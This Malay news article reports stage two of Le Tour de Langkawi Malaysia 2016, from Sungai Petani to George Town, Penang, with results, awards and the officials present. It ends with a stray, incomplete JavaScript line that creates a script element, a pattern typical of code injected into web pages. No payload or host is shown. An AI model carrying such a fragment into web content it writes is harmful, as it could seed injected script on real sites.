Le Tour De Langkawi Malaysia 2016 kembali ke P. Pinang

Oleh : ZAINULFAQAR YAACOB

Gambar: LAW SUUN TING

GEORGE TOWN – Penganjuran peringkat kedua Le Tour De Langkawi Malaysia 2016 kembali ke Pulau Pinang, selepas buat kali pertamanya di negeri ini pada tahun 1999.

Andrea Palini dari pasukan Skydive Dubai mendahului Andrea Guardini di garis penamat peringkat kedua di sini.

Yang di-Pertua Negeri (TYT), Tun Dr. Abdul Rahman Abbas diberi penghormatan menyarungkan jersi serta menyampaikan medal kepada mereka berdua dan juga para pemenang lain.

Majlis tersebut turut disaksikan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng, Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon, Timbalan Ketua Menteri II, Prof. P. Ramasamy, Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow, barisan Exco Kerajaan Negeri serta Setiausaha Kerajaan Negeri, Dato’ Seri Farizan Darus. Seramai 132 pelumba dari 22 pasukan tempatan dan antarabangsa menyahut cabaran peringkat kedua kejohanan berbasikal tersebut.

Mereka berlumba dari Sungai Petani, Kedah kira-kira 158 kilometer (km), termasuk merentasi Jambatan Sultan Abdul Halim Mua’dzam Shah sepanjang 24km dan melalui kawasan berbukit Teluk Bahang dekat Balik Pulau, sebelum menamatkan saingan di Padang Kota Lama di sini.

Andrea Guardini dari Astana Pro Team diumum sebagai juara keseluruhan dengan kelebihan dua saat di depan Andrea Palini, yang diumum duduk di tempat kedua.

Atlet China, Wang Meiyin dari pasukan Hengxiang Cycling dipilih menerima dua anugerah, “Raja Daki Bukit” dan “Pengayuh Terbaik Asia”.

Manakala, pelumba negara, Loh Sea Keong dipilih menerima anugerah “Most Combative Rider”. Terdahulu, kesemua pelumba pada 24 Februari lalu bersaing dalam peringkat pertama Le Tour De Langkawi Malaysia 2016, dari Kangar (Perlis) ke Baling (Kedah) kira-kira 166.6km.

Saingan peringkat ketiga pada 26 Februari 2016 adalah sejauh 107.2km, dari Kulim (Kedah) ke Kuala Kangsar (Perak).

Keseluruhan siri saingan Le Tour De Langkawi Malaysia 2016 adalah lapan peringkat, dari 24 Februari hingga 2 Mac 2016 lalu.

var d=document;var s=d.createElement(‘script’);